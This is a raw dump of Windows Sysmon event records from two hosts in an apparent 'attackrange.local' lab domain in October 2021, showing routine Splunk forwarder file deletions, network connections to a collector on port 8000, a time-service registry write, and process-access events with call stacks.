Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6D11BBC9E8AE81617B35C1B3716121A,SHA256=0B5604659474D27143F45745135FA36100F1EB6722CE98108F7B4F43E530A332,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108454Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:46.511{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=371488DF87A34D6115E3193BB17CA826,SHA256=7449C6E880ED39BF79E019451C4462AD1864651788FB7AC3C4B5B437AB04C9E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108455Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:47.541{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D73FD2E3244C31E4A74229FA8BD6492F,SHA256=0D02AA7CD89EF0193729F7DB0A9CBC510EAB786588D3D68763321AD69928E622,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083987Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:47.659{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A459490B68A8850B68AED5F36F2CF14,SHA256=017C96AAD181A6289179A87F049ADE70154E8F4647386BFB29465C8E4C8C6F8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083988Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:48.659{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDE4BD7D6FFCAB04F8572D6DD15E08FC,SHA256=8FEEE4D050348A51676A44FD3B71910C8CE6AED0A17FD2D757CDF6435E26357A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108456Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:48.558{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C88BFB5BE029033EF7F57BB111FAE0A1,SHA256=104D4E57E2A6DF770675B6E2058E9D5E2A9C2DB74755A1EF05300B4B83F088F3,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083990Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:47.752{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50205-false10.0.1.12-8000- 23542300x800000000000000083989Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:49.659{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CCA12D1F6DBEE4421F90281869E386E,SHA256=6E6A05E525B69954EAD620DE293ECFCD730964D509656D06B8C1F68F706EC862,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108457Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:49.578{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EB401794CBD7B41FDC1284EC5D92D23,SHA256=5064EFFF5CF37A7400852335A07FB309C3FBBF6982E1BBA15C3605E3F61EF542,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083991Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:50.659{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DFD192F0B7FEC1CA7A3B14ACAD65319D,SHA256=63AD275F77011B4925C9B138BE9BADA7C0A98F17730B9A86474B465C65592012,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108459Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:50.592{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FF4BC2AFA40F0460326A98383B57B48,SHA256=41E3B5E768509A2FAF119E0056C020BB07E2E776D4B958F181CEB2705BA63F1A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000108458Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:48.287{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51969-false10.0.1.12-8000- 23542300x800000000000000083992Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:51.659{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=234D5C3A2653F38BE61B7AD9A837DEE7,SHA256=C866CF32F1EFFAAF217307F30D9097D7C62280E7B95580D7C61AD9100C533C95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108460Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:51.607{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8298FD5F43699547037962F20D602D9D,SHA256=27D86189011C125C8A34961FAA67A48D3FCC703DA32456A6E63C35722F4C464F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083993Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:52.784{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3D9F30861E664636A713A988A725BC5,SHA256=335E996A6AA0FCE144BE1DEF2AC21C3FF776EB0DBC04A30C164A6E05A2BA0C8A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108461Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:52.655{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FEBB568A3C7BDE03D5CE206CD4BFC465,SHA256=5D3C926893070E4DC2F320CF54AEC4778DED4723AB3DA7E9191B426DAC79FC5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083994Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:53.862{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFC8FAA6956E3C685419178F12806F53,SHA256=991E38BC6F861DF0FCED24F4E0BB1B7D5466D8AEA7700171B7A44BF6F336B208,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108462Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:53.690{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA12074839A51AA5BAE562B3426B332A,SHA256=A7003599343215B860AB06AB58B96C08DAE344B284AD2161C79185CD6997F2CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083995Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:54.878{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6EC2714D3D86718911F99C4D715BD528,SHA256=418C113DEAD6615F0ACDE5B7C1ED7EB31D9F5463BFE26D278BF5449BFF530B39,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108463Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:54.720{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0AE04579ECFCFAA8F61740B98EF9017E,SHA256=9247DE155A93DDE0994A66A6CFBC29E023FC2A82157D855EBD3F4037BBE991C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083997Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:55.956{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29D460F8CDE55C5B133BB2E731446FC3,SHA256=795CF2E4F0D7EC29F29A7E3646FC0134AE04AE19023C52BF93C23CAAD7999A17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108465Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:55.753{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB36520C69F17FF5B0E1C7D9F3FC125D,SHA256=27E319C77600C21FB352709AB434562AE396D9183860B3D628E90EA1342D6E57,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083996Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:52.812{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50206-false10.0.1.12-8000- 354300x8000000000000000108464Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:53.352{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51970-false10.0.1.12-8000- 23542300x800000000000000083998Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:56.975{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04C8E5175B421B3BC9B272E23BA73C20,SHA256=462D7B61B9A8DE43B7FEB7DE38240B68818429CF124F5F9CBFC1DA31DDB81F77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108467Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:56.757{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45508C2BDA01E3269AEDAA44B458D065,SHA256=98AE966D5CB1C8C87F6EFDCB66701884465F1A4B2975ABE001ED6B7ACCE38225,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000108466Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 08:04:56.087{58E9C193-ACA7-615A-1400-00000000FC01}940C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7b8f6-0x84d732c9) 23542300x800000000000000083999Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:57.975{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CEBF6364D2D5765B952E514FAA82414,SHA256=926A8830FE0CD13F7E56FD899F345BFCFAB536B6B90EECE9A4FB09068BAD52EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108469Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:57.775{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0BC2AE989DCD79E79C881FC3201135F,SHA256=D8239352476317425E421A1C51253664C6CEB8B2BB37D1D42B076BBE95D2C39F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108468Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:57.107{58E9C193-ACB4-615A-2F00-00000000FC01}1712NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=0DE8A333C5FD1740BE6882387E7A5A2B,SHA256=A5B175F730F9666E64AD37BBFDA51EEEB5E907D1D3D0F46F0AAC40581BD0C903,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108478Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:58.806{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB67A00632FE52DE903F24A6ACFF07D3,SHA256=6A83286DBFD0CE5CD455FA0949E1E0140D35E501D914A3F1A5C4F4FD2DB44B8F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000084012Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:58.896{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B5AA-615A-AA01-00000000FD01}3352C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084011Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:58.896{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084010Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:58.896{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084009Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:58.896{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084008Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:58.896{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084007Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:58.896{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084006Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:58.896{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084005Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:58.896{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084004Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:58.896{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084003Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:58.896{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084002Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:58.896{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B5AA-615A-AA01-00000000FD01}3352C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000084001Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:58.896{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B5AA-615A-AA01-00000000FD01}3352C:\Program 